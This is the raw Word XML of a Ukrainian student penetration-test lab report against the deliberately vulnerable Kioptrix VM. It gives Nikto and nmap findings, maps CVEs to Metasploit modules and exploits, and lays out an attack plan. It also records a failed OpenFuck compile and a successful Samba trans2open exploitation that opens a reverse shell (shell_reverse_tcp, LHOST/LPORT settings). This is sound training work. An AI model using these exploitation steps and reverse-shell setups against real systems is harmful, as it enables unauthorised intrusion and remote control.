          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 3.1.1 — Nikto проти http://192.168.56.102 (11 знахідок)</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Знахідка 1 (КРИТИЧНА): mod_ssl 2.8.4 вразливий до CVE-2002-0082 (remote buffer overflow → shell). Nikto прямо посилається на CVE.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 2 (ВИСОКА): Apache/1.3.20 та OpenSSL/0.9.6b — EOL версії з безліччю відомих CVE.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 3 (СЕРЕДНЯ): Directory indexing на /manual/, /cgi-bin/ — розкриває структуру сервера. /test.php знайдено — потенційно небезпечний файл.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nikto — порт 443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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228975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 3.1.2 — Nikto проти https://192.168.56.102 (8 знахідок)</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Знахідка 1 (КРИТИЧНА): та сама CVE-2002-0082 — mod_ssl/2.8.4 вразливий на HTTPS також.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 2 (ВИСОКА): SSLv2 активований — вразливий до DROWN-атаки (CVE-2016-0800). Клієнти, що підключаються через HTTPS, можуть бути атаковані.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 3 (СЕРЕДНЯ): самопідписаний сертифікат — MitM без попереджень у старих клієнтах.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap --script vuln</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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848100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 3.1.3 — nmap --script vuln -p 22,80,139,443</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Знахідка 1 (ВИСОКА): SSHv1 підтримується — вразливий до CRC32 compensation attack (CVE-2001-0572). SSH-протокол першого покоління має відому криптографічну слабкість.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 2 (ВИСОКА): SSL CCS Injection (CVE-2014-0224) на порті 443 — MitM дешифрування трафіку.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Знахідка 3 (ВИСОКА): SMB CVE-2009-3103 — DoS на SMBv2. Але Kioptrix має Samba, де реальніша загроза — CVE-2003-0201.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Завдання 3.2 — Зіставлення CVE та план атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Сервіс і версія</w:t>
            </w:r>
          </w:p>
        </w:tc>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Метасплоїт / Exploit</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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pre-auth?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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spacing w:after="40" w:before="40"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Надійність</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Samba 2.2.1a (порт 139)</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CVE-2003-0201</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10.0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exploit/linux/samba/trans2open (так)</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Так</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Висока — перевірена на Samba 2.2.x, платформа x86</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Apache mod_ssl 2.8.4 (порт 80/443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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CVE-2002-0082</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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10.0</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OpenFuck exploit (47080.c — потребує компіляції)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Так</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2226"/>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Середня — складна компіляція, залежить від target offset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OpenSSH 2.9p2 (порт 22)</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CVE-2001-0572</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7.5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Немає готового MSF-модуля, PoC складний</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Так</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Низька — складна атака на SSHv1, не практична без root</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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OpenSSL 0.9.6b (порт 443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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CVE-2016-0800 (DROWN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>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Немає MSF-модуля, потребує другого вразливого сервера</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Так</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2226"/>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Низька — потребує спеціальних умов для MitM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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EBF3FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="140"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="140"/>
              <w:right w:type="dxa" w:w="280"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">ПЛАН АТАКИ (пентест-нотатка):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Пріоритет 1 — Samba trans2open (CVE-2003-0201): pre-auth RCE, готовий Metasploit-модуль, payload linux/x86/shell_reverse_tcp (важливо — не Meterpreter, бо ядро 2.4.x не підтримує staged payloads). Мінімальний ризик виявлення.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Пріоритет 2 — mod_ssl OpenFuck (CVE-2002-0082): pre-auth RCE, але потребує компіляції з libssl-dev та правильного target offset. Складніший у виконанні.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Рішення: спробувати Samba спочатку (вища надійність). Якщо не спрацює — перейти до mod_ssl.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="4"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Частина 4 — Експлуатація (Advanced, 20 балів)</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Завдання 4.1 — Отримання root-доступу</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (12 балів)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Задокументована невдача: Спроба OpenFuck (CVE-2002-0082)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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600450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 4.1.1 — OpenFuck (47080.c) — помилки компіляції</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Спроба 1: скопіював 47080.c з exploitdb та спробував скомпілювати: gcc -o openfuck /tmp/openfuck.c -lcrypto</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Результат: 3 помилки компіляції — SSL_CTX неповний тип, SSL_CTX_set_options невідома функція, CRYPTO_malloc_init не оголошена.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Причина: exploit написаний під OpenSSL 0.9.x API, яке несумісне з сучасним OpenSSL 3.x на Kali.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Спроба 2: apt install libssl-dev, перекомпіляція з -lssl -ldl — та сама помилка CRYPTO_malloc_init.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Рішення: виправлення цього exploit потребує патчування API-викликів під сучасний OpenSSL — виходить за рамки часу. Переходжу до Samba trans2open.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FAFCFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Висновок з невдачі: OpenFuck у реальному пентесті вимагає або старого середовища з OpenSSL 0.9.x, або значної доопрацювання вихідного коду. Надійніший шлях — Samba CVE-2003-0201.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Успішна експлуатація: Samba trans2open (CVE-2003-0201)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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600450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рис. 4.1.2 — Metasploit: exploit/linux/samba/trans2open — сесія відкрита</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Обрано модуль: exploit/linux/samba/trans2open (переповнення буфера у trans2open запиті Samba 2.2.x).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload: linux/x86/shell_reverse_tcp — обов'язково замість Meterpreter, бо ядро Linux 2.4.7 не підтримує staged payloads.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Конфігурація: RHOSTS=192.168.56.102, LHOST=192.168.56.100, LPORT=4444.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Виконання: Metasploit перебирав return addresses (0xbffffdfc → 0xbffffafc) — стандартна поведінка.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Результат: "Command shell session 1 opened" — зворотне з'єднання встановлено з Kioptrix.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715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352800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="40"/>
